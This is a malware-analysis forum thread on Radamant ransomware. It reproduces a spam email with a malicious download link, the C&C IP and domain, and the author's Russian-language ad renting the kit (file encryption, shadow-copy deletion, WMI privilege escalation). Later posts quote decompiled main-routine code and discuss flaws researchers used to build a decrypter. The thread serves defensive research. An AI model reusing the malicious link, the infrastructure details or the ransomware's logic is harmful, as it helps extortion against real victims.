A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27759  by Xylitol
 Wed Jan 27, 2016 10:34 am
Received yesterday via spam.
Code: Select all
Return-path: <AmericanExpress@welcome.aexp.com>
Envelope-to: ***********
Delivery-date: Tue, 26 Jan 2016 03:52:46 -0300
Received: from [14.140.242.155] (port=5692 helo=14.140.242.155.static-Delhi-vsnl.net.in)
    by cpanel7.wnpower.com with esmtp (Exim 4.86)
    (envelope-from <AmericanExpress@welcome.aexp.com>)
    id 1aNxUK-0000SW-8B
    for *************; Tue, 26 Jan 2016 03:52:46 -0300
Message-ID: <CUSETI43.4826342@welcome.aexp.com>
Date: Tue, 26 Jan 2016 17:01:04 +1000
From: Lesley Bennett via Dropbox <no-reply@dropbox.com>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Thunderbird/24.2.0
MIME-Version: 1.0
To: <***************>
Content-Type: multipart/alternative;
boundary="------------060301010206020905030306"
X-Spam-Status: Yes, score=12.4
X-Spam-Score: 124
X-Spam-Bar: ++++++++++++
X-Spam-Report: Spam detection software, running on the system "cpanel7.wnpower.com",
has identified this incoming email as possible spam.  The original
message has been attached to this so you can view it or label
similar future email.  If you have any questions, see
root\@localhost for details.

Content preview:  Emile Lamont used Dropbox to share a file with you! Click
   here (https://www.cubbyusercontent.com/pl/Supplementary+Agreement+26_01_2016.zip/_8c97a454f11b45e7ac6cfb4ec5109a23)
    to view. © 2016 Dropbox [...]

Content analysis details:   (12.4 points, 5.0 required)

  pts rule name              description
---- ---------------------- --------------------------------------------------
  3.5 HELO_DYNAMIC_SPLIT_IP  Relay HELO'd using suspicious hostname (Split
                             IP)
  0.2 CK_HELO_GENERIC        Relay used name indicative of a Dynamic Pool or
                             Generic rPTR
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was blocked.
                             See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: cubbyusercontent.com]
  0.0 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level mail
                             domains are different
  0.0 T_SPF_HELO_TEMPERROR   SPF: test of HELO record failed (temperror)
  4.0 SPF_FAIL               SPF: sender does not match SPF record (fail)
[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=americanexpress%40welcome.aexp.com;ip=14.140.242.155;r=cpanel7.wn​power.com]
  0.2 PP_MIME_FAKE_ASCII_TEXT BODY: MIME text/plain claims to be ASCII but
                             isn't
  1.6 HTML_IMAGE_ONLY_24     BODY: HTML: images with 2000-2400 bytes of words
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.8 BAYES_50               BODY: Bayes spam probability is 40 to 60%
                             [score: 0.5000]
  2.0 RDNS_NONE              Delivered to internal network by a host with no rDNS
X-Spam-Flag: YES
Subject: ***SPAM*** Lesley Bennett shared "Supplementary Agreement 26_01_2016.zip" with you

This is a multi-part message in MIME format.
--------------060301010206020905030306
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Emile Lamont used Dropbox to share a file with you!

Click here (https://www.cubbyusercontent.com/pl/Supplementary+Agreement+26_01_2016.zip/_8c97a454f11b45e7ac6cfb4ec5109a23) to view.



© 2016 Dropbox

--------------060301010206020905030306
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

<html>
  <head>
    <meta content="text/html; charset=ISO-8859-1"
      http-equiv="Content-Type">
    <title>Lesley Bennett shared "Supplementary Agreement 26_01_2016.zip" with you</title>
  </head>
  <body text="#000000" vlink="#551A8B" link="#0B6CDA" alink="#EE0000">
    <div>
<center>
<table border="0" cellpadding="8" cellspacing="0">
<tbody>
<tr>
<td valign="top">
<table style="border-radius:4px;border:1px #dceaf5 solid" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td colspan="3" height="6"></td>
</tr>
<tr style="line-height:0px">
<td style="font-size:0px" align="center" height="1" width="100%"><img src="https://www.dropbox.com/static/images/emails/glyph/glyph_34@2x.png"  width="40px"></td>
</tr>
<tr>
<td>
<table style="line-height:25px" align="center" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td colspan="3" height="30"></td>
</tr>
<tr>
<td width="36"></td>
<td style="color:#444444;border-collapse:collapse;font-size:11pt;font-family:proxima_nova,'Open Sans','Lucida Grande','Segoe UI',Arial,Verdana,'Lucida Sans Unicode',Tahoma,'Sans Serif';max-width:454px" align="left" valign="top" width="454"><div style="text-align:center">
Lesley used Dropbox to share a file with you! <br>
<br>
<a style="color:rgb(0,126,230);text-decoration:none" href="https://www.cubbyusercontent.com/pl/Supplementary+Agreement+26_01_2016.zip/_8c97a454f11b45e7ac6cfb4ec5109a23" target="_blank">Click here to view</a>.</div></td>
<td width="36"></td>
</tr>
<tr>
<td colspan="3" height="36"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td height="10"></td>
</tr>
<tr>
<td style="padding:0;border-collapse:collapse">
<table align="center" border="0" cellpadding="0" cellspacing="0">
<tbody>
<tr style="color:#a8b9c6;font-size:11px;font-family:proxima_nova,'Open Sans','Lucida Grande','Segoe UI',Arial,Verdana,'Lucida Sans Unicode',Tahoma,'Sans Serif'">
<td align="left" width="400"></td>
<td align="right" width="128">© 2015 Dropbox</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</center>
</div>
  </body>
</html>

--------------060301010206020905030306--
Code: Select all
https://www.cubbyusercontent.com/pl/Supplementary+Agreement+26_01_2016.zip/_8c97a454f11b45e7ac6cfb4ec5109a23
https://www.virustotal.com/en/file/7a43 ... 453851770/
Code: Select all
00409A34  J:\Krypton_15.0_SR\Bin\StubNew.pdb
Image

VirtualAllocEx/RtlDecompressBuffer to unpack.
https://www.virustotal.com/en/file/e99c ... 453852951/
C&C:
Code: Select all
• dns: 1 ›› ip: 31.184.234.68 - adress: TANGOTANGOCASH.COM
Desc from author:
Code: Select all
Radamant Ransomware Kit
Доброго времени суток, уважаемые мастера своего дела!
Сегодня я хотел бы представить Вам новое и гибкое решение для конвертирования Ваших загрузок.
Для начала рассмотрим технические аспекты данного ПО:

Клиентская часть

    Написан на С++;
    Вес 70 кб;
    Шифрование всех носителей информации (HDD, USB-flash and Shared folder);
    Шифрование файлов по 1607 маскам (с возможностью real-time изменения)
    AES-256 (32-символьный ключ для каждого файла) с шифрованием ключа RSA-2048;
    При прерывании шифрования (выключение / перезагрузка) начинает шифрование с того места, где остановился;
    При перезагрузке компьютера ищет новые файлы для шифрования;
    Работа под учётной записью пользователя;
    Повышение привилегий путем социальной инженерии (WMI);
    Удаление теневых копий файлов и точек восстановления Windows;
    Самоудаление после дешифровки;

Серверная часть

    Написана на РНР+MySQL (Bootstrap);
    Проверка оплаты ВТС автоматически (Blockchain API);
    Генерация адреса для каждого бота;
    Возможность динамически менять настройки для всех ботов, так и для каждого в отдельности;
    Возможность задать количество ВТС для оплаты как всем ботам, так и каждому по отдельности;
    Возможность разблокировать бота или удалить ключи;
    Возможность проверить, была ли произведена выплата ботом по ID;
    Возможность добавить бота в избранное;
    Возможность динамически менять расширения для шифрования, так и приоритет шифрования;
    Возможность менять настройки ПО "на лету";
    Высокая степень защиты админ панели (проверена пользователем RedBear);

Скриншоты административной панели:
Home http://s019.radikal.ru/i609/1512/86/c72a55e9c740.jpg
Setting http://s019.radikal.ru/i636/1512/4e/8e3ea9da1e91.png
Files formats http://s018.radikal.ru/i524/1512/43/0f445a128e2d.png
Bots http://s020.radikal.ru/i716/1512/99/7b1ace21f519.jpg
More (Bots) http://s020.radikal.ru/i716/1512/c3/6731d1e98be5.png
Statistics http://s020.radikal.ru/i705/1512/af/300b1bfb36d5.jpg
Favorites http://s020.radikal.ru/i713/1512/49/abe96b687512.png
Search http://s019.radikal.ru/i613/1512/77/8cee7ad3fc20.png

Лендинг

    Реализован профессиональный перевод на 8 языках (US/DE/PL/FR/NL/ES/VN/RU);
    Возможность изменять текст и добавлять необходимые языки (делается индивидуально по заявке в jabber (бесплатно));
    Текст составлен с учетом психологии человека;
    Написана мини-инструкция для оплаты (вплоть до добавления видео с показом всего процесса (Регистрация кошелька - покупка ВТС));
    По истечении таймера сумма увеличивается в 2 раза;

Скриншоты лендинга:
1 http://s017.radikal.ru/i421/1512/33/71fcb90e8e51.png
2 http://s005.radikal.ru/i209/1512/d9/374938ea1632.png
3 http://s017.radikal.ru/i420/1512/f1/a7008dce3db4.png

Аренда
ПО распространяется только в таком виде и никак более.
Поддерживается работа по всем странам. Ограничений нет.
Срок аренды - 1 месяц
Цена аренды: 1k$
Возможен тестовый период - 48 часов (100$)
В аренду входит:
1. FastFlux хостинг с выделенным сервером
2. Смена доменов при абузах
3. Крипт ПО (Polymorph). Криптуется только данное ПО
4. Администрирование (смена IP, доменов, DNS, решение тех. проблем)
Все это бесплатно. Вы платите лишь за аренду.

Комплект поставки:
>>> Билд на Ваш домен (регистрируем сами)
>>> Доступ в админ-панель (устанавливаем мы)
>>> Регулярные и бесплатные улучшения ПО
>>> Техническая поддержка (16/7)

Таким образом, Вы арендуете ПО, которое
1. Не требует долгой и нудной настройки
2. Не требует оплаты дорогущих хостингов
3. Не требует разорительных криптов
4. Не требует находиться 24/7 у ботнета


Мы очень трепетно относимся к анонимности наших клиентов, поэтому о нашем сотрудничестве не узнает никто из третьих лиц.
Мы работаем с очень авторитетными вендорами различных услуг
Мы имеем в команде общепризнаных программистов высокой квалификации
Мы работаем для Вас.

Контакт: *********

Внимание! Количество мест ограничено.
Radamant Ransomware VS Fabian Wosar ~ http://www.bleepingcomputer.com/news/se ... -released/
Radamant Ransomware distributed via Rig EK ~ http://www.cyphort.com/radamant-ransomw ... ia-rig-ek/
Attachments
infected
(61.16 KiB) Downloaded 142 times
 #27760  by EP_X0FF
 Wed Jan 27, 2016 1:18 pm
Kind of lol, but this malware with all symbol names inside, e.g.
Code: Select all
  if ( !check_my_path() )
    copyMeToWin();
  if ( !checkARun() )
    UACME();
  if ( !checkARun() )
    SetARun();
  CreateMutexA(0, 1, "radamantv2.1");
  if ( GetLastError() == 183 )
    exit(0);
  v4 = time(0);
  srand(v4);
  getmyHASH(MY_HASH);
  getID(id);
  decrypt_domain(domain);
  for ( Str = 0; (signed int)Str <= 2 && GetIP("checkip.dyndns.org", Class, sIP) != 1; ++Str )
    Sleep(0xBB8u);
  while ( !getDomainsFromReg() )
  {
    Str = (char *)malloc(0x1770u);
    SendDataToServer(domain, domains, Class, 0, Str);
    Str[strlen(Str) - 1] = 0;
    setDomains(Str + 3);
    free(Str);
  }
  _beginthread(dowork, 0, 0);
  while ( !fl_showform )
    Sleep(0x7D0u);
  sprintf(&Dest, S_Landing, (char *)&domain_list + 25 * cur_domain, id);
  ShellExecuteA(0, "open", &Dest, 0, 0, 5);
  sprintf(&Dest, S_Shtrcut, (char *)&domain_list + 25 * cur_domain, id);
  CreateFileOnDskTop("YOUR_FILES.url", &Dest);
  while ( 1 )
    Sleep(0x2710u);
}
muhahah

coding skill level - GOD Image
Code: Select all
signed int __cdecl my_strcmp(char *a1, char *a2)
{
  size_t v2; // ebx@1
  signed int v4; // [sp+18h] [bp-230h]@2
  size_t i; // [sp+1Ch] [bp-22Ch]@3
  char v6; // [sp+20h] [bp-228h]@3
  char Dest; // [sp+130h] [bp-118h]@3
  char v8[8]; // [sp+240h] [bp-8h]@5

  v2 = strlen(a1);
  if ( v2 == strlen(a2) )
  {
    sprintf(&Dest, "%s", a1);
    sprintf(&v6, "%s", a2);
    for ( i = 0; i < strlen(&Dest); ++i )
    {
      if ( v8[i - 272] > 64 && v8[i - 272] <= 90 )
        v8[i - 272] += 32;
      if ( v8[i - 544] > 64 && v8[i - 544] <= 90 )
        v8[i - 544] += 32;
      if ( v8[i - 272] != v8[i - 544] )
        return 0;
    }
    v4 = 1;
  }
  else
  {
    v4 = 0;
  }
  return v4;
}
this guy definitely have a nice perspective in AV industry.
 #27762  by Grinler
 Wed Jan 27, 2016 11:02 pm
Does thing even install properly? Keep crapping out on me.
 #27774  by Fabian Wosar
 Thu Jan 28, 2016 11:27 am
EP_X0FF wrote:Kind of lol, but this malware with all symbol names inside, e.g.
Yes, that gave me a chuckle, too. If you really want to laugh, take a look at the encryptFile function and look at the convoluted mess they introduced in an attempt to stop my decrypter. They still didn't fix the original issue. I can also recommend encrypt_RSA. The lack of error handling causes the encryption of the key material to fail on some systems (about 2 or 3 in a 100 in my experience). Meaning all the encryption keys and data is stored unencrypted in the header, because the buffer was never touched by CryptEncrypt and is just written out to the file. What makes matters worse is that in those cases the header has a different size (200 bytes instead of the 256 bytes they expect) in those bugged cases, which means the decryption routine will mess up all the files in case the user decided to pay the ransom. Has been that way since the very first version.
 #27867  by TETYYSs
 Fri Feb 12, 2016 8:42 pm
Intimacygel wrote: What forum is this image from?
by ridiculous amount of forum 'achievements' i'd say that's HF
 #27878  by Phant0m
 Mon Feb 15, 2016 1:58 pm
Intimacygel wrote:
Xylitol wrote: Image
What forum is this image from?
HF confirmed lol
 #28043  by R136a1
 Wed Mar 16, 2016 9:12 am
Here is a Radamant sample with compilation timestamp from December 2015 which uses the mentioned trick with WMI console to elevate privileges, so before H1N1 loader v2. The sample comes with a lot of symbols left-behind where you can observe that the author implemented his own idea of UACMe. Inside the function is also there aforementioned WMI trick implemented:

Image

This feature was also advertised in the descritption from the author (see Xylitol post):
Повышение привилегий путем социальной инженерии (WMI)

-> Privilege escalation through social engineering (WMI);
Newer versions of the Ransomeware doesn't seem to make use of this functionality, although the needed strings are still present.

Fresh and old Radamant sample attached.
Attachments
PW: infected
(32.7 KiB) Downloaded 84 times